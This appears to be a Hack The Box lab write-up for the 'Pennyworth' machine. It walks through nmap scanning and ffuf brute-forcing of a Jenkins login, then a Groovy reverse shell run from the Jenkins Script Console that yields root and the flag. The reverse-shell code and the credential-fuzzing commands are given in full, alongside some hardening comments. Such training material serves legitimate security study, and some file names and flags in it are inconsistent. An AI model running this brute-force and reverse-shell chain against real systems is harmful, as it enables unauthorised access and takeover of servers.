09.PENNYWORTH (GROOVY SCRIPTING & REVERSE SHELL)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 8080/tcp open  http    Jetty 9.4.39.v20210325
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding -sC is another good way to learn more about a service
       - the -sC option runs the "safe" default scripts, which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 8080
 PORT   STATE SERVICE VERSION
 8080/tcp open  http    Jetty 9.4.39.v20210325
 |_http-title: Site doesn't have a title (text/html;charset=utf-8).
 |_http-server-header: Jetty(9.4.39.v20210325)
 | http-robots.txt: 1 disallowed entry 
 |_/

 * the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 8080
 PORT   STATE SERVICE
 8080/tcp open  http-proxy
 | http-enum: 
 |_  /robots.txt: Robots file

 * the --script=vuln option runs scripts that focus specifically on detecting known 
   vulnerabilities in the service running on the scanned port (8080 here)
    - e.g., weak configurations, or known vulnerabilities in the Jetty web service
       - if no results are found the service may be fully patched — or the vuln scripts simply
         have no check for it, so manual inspection of the application is still needed (as below)

FOOTHOLD/COMPROMISE

Submit root flag
#walk the application and identify potential entry points
root@htb:~$ BROWSER > http://10.129.223.232:8080/robots.txt
 # we don't want robots to click "build" links
 User-agent: *
 Disallow: /

root@htb:~$ BROWSER > {targetIP:port}
 Welcome to Jenkins!
 
  * possible vulnerable entry points
    - login form
       - could be vulnerable to brute force attacks
 
root@htb:~$ BROWSER > {targetSite:port}
 username: null
 password: null

 Invalid username or password
         
 * submit expected input
root@htb:~$ find / -iname usernames 2>/dev/null
 /usr/share/seclists/Usernames
root@htb:~$ ls
 top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ find / -iname passwords 2>/dev/null
 /usr/share/seclists/Passwords
root@htb:~$ ls
 500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .

root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.178.161:8080
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.178.161:8080/login?from=%2F
 Welcome to Jenkins!
 Username: null
 Password: null
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 POST /j_spring_security_check HTTP/1.1
 Host: 10.129.178.161:8080
 Content-Length: 55
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://10.129.178.161:8080
 Content-Type: application/x-www-form-urlencoded
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.178.161:8080/login?from=%2F
 Accept-Encoding: gzip, deflate, br
 Accept-Language: en-US,en;q=0.9
 Cookie: JSESSIONID.9d35f114=node01hvgj3wjo0ofrnt7s0zzlo2ew0.node0
 Connection: close

 j_username=null&j_password=null&from=%2F&Submit=Sign+in
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in

 * add the FUZZ markers to the username/password fields; each marker name must match the keyword
   given after ':' in the corresponding -w argument (unameFUZZ/pwFUZZ here), and the file name
   must match the one passed to -request

root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:UFUZZ -w pWord.txt:PFUZZ -c -fr "Invalid username or password"
 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 14ms]
    * PFUZZ: root
    * UFUZZ: admin

 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
    * PFUZZ: password1
    * UFUZZ: admin

root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r 
 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: admin1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 96ms]
    * PFUZZ: password
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 87ms]
    * PFUZZ: root
    * UFUZZ: root

 [Status: 200, Size: 17514, Words: 1111, Lines: 33, Duration: 78ms]
    * PFUZZ: password1
    * UFUZZ: root

 [Status: 200, Size: 17516, Words: 1111, Lines: 33, Duration: 88ms]
    * PFUZZ: admin
    * UFUZZ: root

root@htb:~$ ffuf -request request.txt -request-proto http -mode clusterbomb -w uName.txt:unameFUZZ -w pWord.txt:pwFUZZ -c -fr "Invalid username or password" -r -fs 19540

 * the -c flag outputs the result in color
 * the -r flag follows HTTP redirects during fuzzing
 * the -fs flag filters out responses of the given content size (here 19540, presumably the size of
   the page returned after the redirect for a failed login, so only genuine logins remain)
 * the -fr flag filters results based on a regex pattern.

 * the final result will contain a handful of possible credentials to use
#
root@htb:~$ nc -nlvp 8088

root@htb:~$ BROWSER > http://10.129.178.161:8080
 username: root
 password: password
 
JENKINS > Manage Jenkins > Script Console

// Groovy submitted through the Jenkins Script Console executes inside the Jenkins JVM
// with the privileges of the Jenkins service account (root on this target, per the
// `id` output below). Console access is therefore equivalent to OS-level code execution
// and must be restricted to trusted administrators.
Thread.start {
 String host="{attackerIP}"; // placeholder: the listener's address
 int port=8088;              // must match the `nc -nlvp 8088` listener started above
 String cmd="/bin/bash";
 // Start the shell with stderr merged into stdout, then open a TCP connection to the listener.
 // NOTE: because of redirectErrorStream(true), the separate `pe` stream never carries data.
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
 // Copy bytes between socket and process until the socket closes or the process exits
 // (exitValue() throws while the process is still running, which is what the try/catch relies on).
 OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}

 * click the "run" button to have the target connect to the attacker's netcat server
   - the Script Console runs arbitrary Groovy inside the Jenkins process, so the weak admin
     credentials found above translate directly into code execution as the account Jenkins
     runs under (root here, see the id output below); restricting console access and not
     running Jenkins as root are the corresponding hardening steps
root@htb:~$ nc...
 listening on [any] 8088 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.178.161] 51444
 whoami
  root
 id
  uid=0(root) gid=0(root) groups=0(root)
 find / -iname flag.txt 2>/dev/null
  /root/flag.txt
 cat /root/flag.txt
  9cdfb439c7876e703e307864c9167a15
